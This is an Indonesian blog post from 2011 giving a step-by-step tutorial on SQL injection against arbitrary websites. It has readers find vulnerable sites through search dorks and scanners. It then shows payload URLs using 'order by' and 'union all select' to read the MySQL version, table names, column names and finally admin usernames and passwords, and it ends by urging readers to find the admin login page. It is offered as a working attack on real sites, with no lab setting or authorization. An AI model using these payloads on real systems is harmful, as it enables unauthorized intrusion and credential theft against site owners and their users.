Jumat, 16 September 2011

belajar SQLi scanner

1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..
kalau aku sih pake SQLi Scanner di
http://revtan.site40.net/scanner/? ama http://adf.ly/9GHb
2. pilih aja dork listnya:
untuk list dork:
di wild-hack.blogspot.com
3.
untuk yang pakai manual cek di google/bing:
contoh: http://site.com/index.php?id=1' <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

berarti Webnya bisa di hack

untuk yang pakai scanner : udah disediain web yang bisa dihack

4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error

example:
http://site.com/index.php?id=1 order by 1-- <-- no error
http://site.com/index.php?id=1 order by 2-- <-- no error
http://site.com/index.php?id=1 order by 3-- <-- no error
http://site.com/index.php?id=1 order by 4-- <-- ERROR..!

5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
http://site.com/index.php?id=-1 union all select 1,2,3--

(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)

6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:

http://site.com/index.php?id= union all select 1,@@version,3--

7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!

8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()
ex:

http://site.com/index.php?id= union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
1. buka link: http://adf.ly/9GIB
2. dibagian string masukan text yang ingin di hex
3. click convert
4. copy hex:
jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()
diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273
ex:
http://site.com/index.php?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--

10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.
lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password contoh:
group_concat(username,0x3a,password)
<- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a
lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users)
maka from users--
example
http://site.com/index.php?id=-1 union all select 1,group_concat(username,0x3a,password)3 from users--
11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin
12. silahkan cari sendiri halaman login admin..
13 Enjoy~~
kalo ada yang punya berbagi karna
dari berbagi dapat sukses